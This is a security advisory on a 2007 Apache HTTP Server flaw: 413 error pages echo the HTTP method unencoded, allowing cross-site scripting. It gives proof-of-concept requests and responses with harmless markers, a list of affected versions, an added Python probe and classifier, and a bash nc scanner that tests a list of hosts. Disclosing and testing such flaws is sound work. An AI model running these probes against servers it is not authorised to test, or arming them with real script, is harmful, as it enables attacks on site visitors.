Apache HTTP Server 413 Error Page HTTP Request Method Cross-Site Scripting Vulnerability

2007-12-04T00:00:00
ID SSV:2536
Type seebug
Reporter Root
Modified 2007-12-04T00:00:00

Description

Apache HTTP Server is a very widely deployed HTTP server. Apache HTTP Server has an input validation issue when handling specially crafted HTTP methods; a remote attacker can exploit it to perform cross-site scripting and obtain sensitive information.

By submitting a malformed HTTP method (which may carry a malicious payload such as JavaScript) together with an invalid Content-Length header, the attacker can make Apache HTTP Server return the client-supplied script in its error page. Any of the following invalid length forms triggers the error page:

Two 'Content-length:' headers equal to zero, i.e.: Content-Length: 0[LF]Content-Length: 0
One 'Content-length:' header with two values, i.e.: "Content-length: 0, 0"
One 'Content-length:' header with a negative value, i.e.: "Content-length: -1"
One 'Content-length:' header with a very large value, i.e.: "Content-length: 9999999999999999999999999999999999999999999999"

When such invalid length data is submitted, Apache 2.x returns a '413 Request Entity Too Large' error. The error page echoes three request-supplied strings, each of which can be tested as a cross-site scripting vector:

the 'Host:' header
the URL
the HTTP method

When the 'Host:' header or the URL is used, Apache HTML-encodes the angle brackets ('<' becomes '&lt;', '>' becomes '&gt;'), so the payload is neutralised. The HTTP method is echoed without encoding.

Host header vector:

REQUEST:

GET / HTTP/1.1
Host: <BADCHARS>
Connection: close
Content-length: -1
[LF]
[LF]

SERVER'S RESPONSE:

HTTP/1.1 413 Request Entity Too Large
Date: Fri, 30 Nov 2007 12:40:19 GMT
Server: Apache/2.0.55 (Ubuntu) PHP/5.1.6
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>413 Request Entity Too Large</title>
</head><body>
<h1>Request Entity Too Large</h1>
The requested resource<br />/<br />
does not allow request data with GET requests, or the amount of data provided in the request exceeds the capacity limit.
<hr>
<address>Apache/2.0.55 (Ubuntu) PHP/5.1.6 Server at &lt;badchars&gt; Port 80</address>
</body></html>

Note that '<BADCHARS>' has been replaced with '&lt;badchars&gt;' (encoded and lower-cased).

URL vector: Apache again HTML-encodes the angle brackets:

REQUEST:

GET /<BADCHARS>/ HTTP/1.1
Host: target-domain.foo
Connection: close
Content-length: -1
[LF]
[LF]

SERVER'S RESPONSE:

HTTP/1.1 413 Request Entity Too Large
Date: Fri, 30 Nov 2007 12:41:17 GMT
Server: Apache/2.0.55 (Ubuntu) PHP/5.1.6
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>413 Request Entity Too Large</title>
</head><body>
<h1>Request Entity Too Large</h1>
The requested resource<br />/&lt;BADCHARS&gt;/<br />
does not allow request data with GET requests, or the amount of data provided in the request exceeds the capacity limit.
<hr>
<address>Apache/2.0.55 (Ubuntu) PHP/5.1.6 Server at target-domain.foo Port 80</address>
</body></html>

Note that '<BADCHARS>' has been replaced with '&lt;BADCHARS&gt;'.

HTTP method vector: the method is not encoded, which allows cross-site scripting:

REQUEST:

<BADCHARS> / HTTP/1.1
Host: target-domain.foo
Connection: close
Content-length: -1
[LF]
[LF]

SERVER'S RESPONSE:

HTTP/1.1 413 Request Entity Too Large
Date: Fri, 30 Nov 2007 12:42:46 GMT
Server: Apache/2.0.55 (Ubuntu) PHP/5.1.6
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>413 Request Entity Too Large</title>
</head><body>
<h1>Request Entity Too Large</h1>
The requested resource<br />/<br />
does not allow request data with <BADCHARS> requests, or the amount of data provided in the request exceeds the capacity limit.
<hr>
<address>Apache/2.0.55 (Ubuntu) PHP/5.1.6 Server at target-domain.foo Port 80</address>
</body></html>

Here '<BADCHARS>' is reflected verbatim. Note, however, that exploiting this requires the attacker to make the victim's browser send a request with the malformed HTTP method; ordinary navigation and HTML form submission only emit GET and POST, which limits the practical impact.
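The following is an added example, not code from the advisory or from ProCheckUp: it builds the three probe requests described above (marker in the Host header, in the URL, and as the HTTP method), each with 'Content-length: -1' to force the 413 page, and classifies whether the marker comes back HTML-encoded or raw. The marker string, the hostname and the sample responses are constructed here for illustration; only probe() touches the network.

```python
"""Probe builder and reflection classifier for the Apache 413 error page issue.

Added example: not the advisory's own code. MARKER, 'target-domain.foo' and the
sample responses below are constructed, modelled on the advisory's exchanges.
"""
import html
import socket

MARKER = "<xss413>"   # constructed marker: the angle brackets show whether escaping happened


def build_request(vector: str, host: str, marker: str = MARKER) -> bytes:
    """Raw HTTP/1.1 request for one reflection vector: 'host', 'url' or 'method'."""
    if vector == "host":
        request_line, host_value = "GET / HTTP/1.1", marker
    elif vector == "url":
        request_line, host_value = f"GET /{marker}/ HTTP/1.1", host
    elif vector == "method":
        request_line, host_value = f"{marker} / HTTP/1.1", host
    else:
        raise ValueError(f"unknown vector {vector!r}")
    # The invalid Content-Length is what makes Apache 2.x answer 413 instead of serving '/'.
    return (
        f"{request_line}\r\nHost: {host_value}\r\nConnection: close\r\n"
        f"Content-length: -1\r\n\r\n"
    ).encode("latin-1")


def classify(response: bytes, marker: str = MARKER) -> tuple[str, str]:
    """Return (status line, 'raw' | 'encoded' | 'absent') for one server response.

    Matching is case-insensitive because Apache lower-cases the Host value
    before echoing it in the <address> footer.
    """
    head, _, body = response.partition(b"\r\n\r\n")
    status = head.split(b"\r\n", 1)[0].decode("latin-1", "replace")
    text = body.decode("latin-1", "replace").lower()
    if marker.lower() in text:
        return status, "raw"          # angle brackets intact: injected markup is live
    if html.escape(marker, quote=False).lower() in text:
        return status, "encoded"      # '<' became '&lt;': reflected but harmless
    return status, "absent"


def probe(host: str, port: int = 80, timeout: float = 5.0) -> dict[str, tuple[str, str]]:
    """Send all three vectors to a live server (needs network; not exercised offline)."""
    results = {}
    for vector in ("host", "url", "method"):
        with socket.create_connection((host, port), timeout=timeout) as sock:
            sock.sendall(build_request(vector, host))
            chunks = []
            while True:               # 'Connection: close' means read until EOF
                data = sock.recv(4096)
                if not data:
                    break
                chunks.append(data)
        results[vector] = classify(b"".join(chunks))
    return results


def _error_page(resource: str, method: str, server_at: str) -> bytes:
    """Constructed 413 page in the shape the advisory shows, for offline checks."""
    return (
        "HTTP/1.1 413 Request Entity Too Large\r\n"
        "Server: Apache/2.0.55 (Ubuntu) PHP/5.1.6\r\nConnection: close\r\n"
        "Content-Type: text/html; charset=iso-8859-1\r\n\r\n"
        "<html><head><title>413 Request Entity Too Large</title></head><body>\n"
        "<h1>Request Entity Too Large</h1>\n"
        f"The requested resource<br />{resource}<br />\n"
        f"does not allow request data with {method} requests, or the amount of data "
        "provided in the request exceeds the capacity limit.\n"
        f"<hr><address>Apache/2.0.55 (Ubuntu) PHP/5.1.6 Server at {server_at} Port 80"
        "</address></body></html>\n"
    ).encode("latin-1")


# Sample responses modelled on the advisory's three exchanges (constructed, not captured).
ESC = html.escape(MARKER, quote=False)
SAMPLE_RESPONSES = {
    "host":   _error_page("/", "GET", ESC.lower()),                 # Host: encoded, lower-cased
    "url":    _error_page(f"/{ESC}/", "GET", "target-domain.foo"),  # URL: encoded
    "method": _error_page("/", MARKER, "target-domain.foo"),        # method: echoed raw
}

if __name__ == "__main__":
    for vector, resp in SAMPLE_RESPONSES.items():
        print(f"{vector:6s} -> {classify(resp)}")
```

Run against the constructed samples, the host and URL vectors classify as 'encoded' and only the method vector as 'raw', matching the advisory. To check a real server, call probe("host.example", 80) and treat a 'raw' result on the 'method' vector as the affected condition; a 'raw' result on the other two vectors would indicate a different, unescaped sink and is worth investigating separately.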

Affected:

Apache Software Foundation Apache 2.2.4
Apache Software Foundation Apache 2.2.3
Apache Software Foundation Apache 2.2.2
Apache Software Foundation Apache 2.2.0
Apache Software Foundation Apache 2.1.8
Apache Software Foundation Apache 2.1.7
Apache Software Foundation Apache 2.1.6
Apache Software Foundation Apache 2.1.5
Apache Software Foundation Apache 2.1.4
Apache Software Foundation Apache 2.1.3
Apache Software Foundation Apache 2.1.2
Apache Software Foundation Apache 2.1.1
Apache Software Foundation Apache 2.1
Apache Software Foundation Apache 2.0.59
Apache Software Foundation Apache 2.0.58
  + Debian Linux 3.1 sparc
  + Debian Linux 3.1 s/390
  + Debian Linux 3.1 ppc
  + Debian Linux 3.1 mipsel
  + Debian Linux 3.1 mips
  + Debian Linux 3.1 m68k
  + Debian Linux 3.1 ia-64
  + Debian Linux 3.1 ia-32
  + Debian Linux 3.1 hppa
  + Debian Linux 3.1 arm
  + Debian Linux 3.1 amd64
  + Debian Linux 3.1 alpha
  + Debian Linux 3.1
Apache Software Foundation Apache 2.0.55
Apache Software Foundation Apache 2.0.54
  + Debian Linux 3.1 sparc
  + Debian Linux 3.1 s/390
  + Debian Linux 3.1 ppc
  + Debian Linux 3.1 mipsel
  + Debian Linux 3.1 mips
  + Debian Linux 3.1 m68k
  + Debian Linux 3.1 ia-64
  + Debian Linux 3.1 ia-32
  + Debian Linux 3.1 hppa
  + Debian Linux 3.1 arm
  + Debian Linux 3.1 amd64
  + Debian Linux 3.1 alpha
  + Debian Linux 3.1
Apache Software Foundation Apache 2.0.53
Apache Software Foundation Apache 2.0.52
  + Apple Mac OS X 10.3.6
  + Apple Mac OS X 10.2.8
  + Apple Mac OS X Server 10.3.6
  + Apple Mac OS X Server 10.2.8
  + RedHat Desktop 4.0
  + RedHat Enterprise Linux WS 4
  + RedHat Enterprise Linux ES 4
  + RedHat Enterprise Linux AS 4
  + Sun Solaris 10
Apache Software Foundation Apache 2.0.51
  + RedHat Fedora Core2
  + RedHat Fedora Core1
Apache Software Foundation Apache 2.0.50
  + MandrakeSoft Linux Mandrake 10.1 x86_64
  + MandrakeSoft Linux Mandrake 10.1
Apache Software Foundation Apache 2.0.49
  + S.u.S.E. Linux Personal 9.1
  + Trustix Secure Linux 2.1
  + Trustix Secure Linux 2.0
Apache Software Foundation Apache 2.0.48
  + MandrakeSoft Linux Mandrake 10.0 AMD64
  + MandrakeSoft Linux Mandrake 10.0
  + S.u.S.E. Linux 8.1
  + S.u.S.E. Linux Personal 9.0 x86_64
  + S.u.S.E. Linux Personal 9.0
  + S.u.S.E. Linux Personal 8.2
  + Trustix Secure Linux 2.1
  + Trustix Secure Linux 2.0
Apache Software Foundation Apache 2.0.47
  + Apple Mac OS X Server 10.3.5
  + Apple Mac OS X Server 10.3.4
  + Apple Mac OS X Server 10.3.3
  + Apple Mac OS X Server 10.3.2
  + Apple Mac OS X Server 10.3.1
  + Apple Mac OS X Server 10.3
  + Apple Mac OS X Server 10.2.8
  + Apple Mac OS X Server 10.2.7
  + Apple Mac OS X Server 10.2.6
  + Apple Mac OS X Server 10.2.5
  + Apple Mac OS X Server 10.2.4
  + Apple Mac OS X Server 10.2.3
  + Apple Mac OS X Server 10.2.2
  + Apple Mac OS X Server 10.2.1
  + Apple Mac OS X Server 10.2
  + Apple Mac OS X Server 10.1.5
  + Apple Mac OS X Server 10.1.4
  + Apple Mac OS X Server 10.1.3
  + Apple Mac OS X Server 10.1.2
  + Apple Mac OS X Server 10.1.1
  + Apple Mac OS X Server 10.1
  + MandrakeSoft Linux Mandrake 9.2 amd64
  + MandrakeSoft Linux Mandrake 9.2
  + MandrakeSoft Linux Mandrake 9.1 ppc
  + MandrakeSoft Linux Mandrake 9.1
Apache Software Foundation Apache 2.0.46
  + RedHat Desktop 3.0
  + RedHat Enterprise Linux WS 3
  + RedHat Enterprise Linux ES 3
  + RedHat Enterprise Linux AS 3
  + Trustix Secure Linux 2.0

No fix is currently available from the vendor: http://www.apache.org/

The following script can be used to test whether a server is affected. The loop body was truncated in the source; it is reconstructed here to send the method-vector request from the description (marker as the HTTP method, 'Content-length: -1') with nc and report hosts whose 413 page echoes the marker with its angle brackets intact:

#!/bin/bash
# PR07-37-scan
# Usage: PR07-37-scan <hosts-file>   (one hostname per line; requires nc)
if [ $# -ne 1 ]
then
echo "$0 <hosts-file>"
exit
fi
for i in `cat $1`
do
# Marker used as the HTTP method; a raw '<PR0737xss>' in the reply means no HTML encoding was applied.
printf '<PR0737xss> / HTTP/1.1\r\nHost: %s\r\nConnection: close\r\nContent-length: -1\r\n\r\n' "$i" \
  | nc -w 5 "$i" 80 | grep -q 'with <PR0737xss> requests' && echo "$i: vulnerable (method echoed unencoded)"
done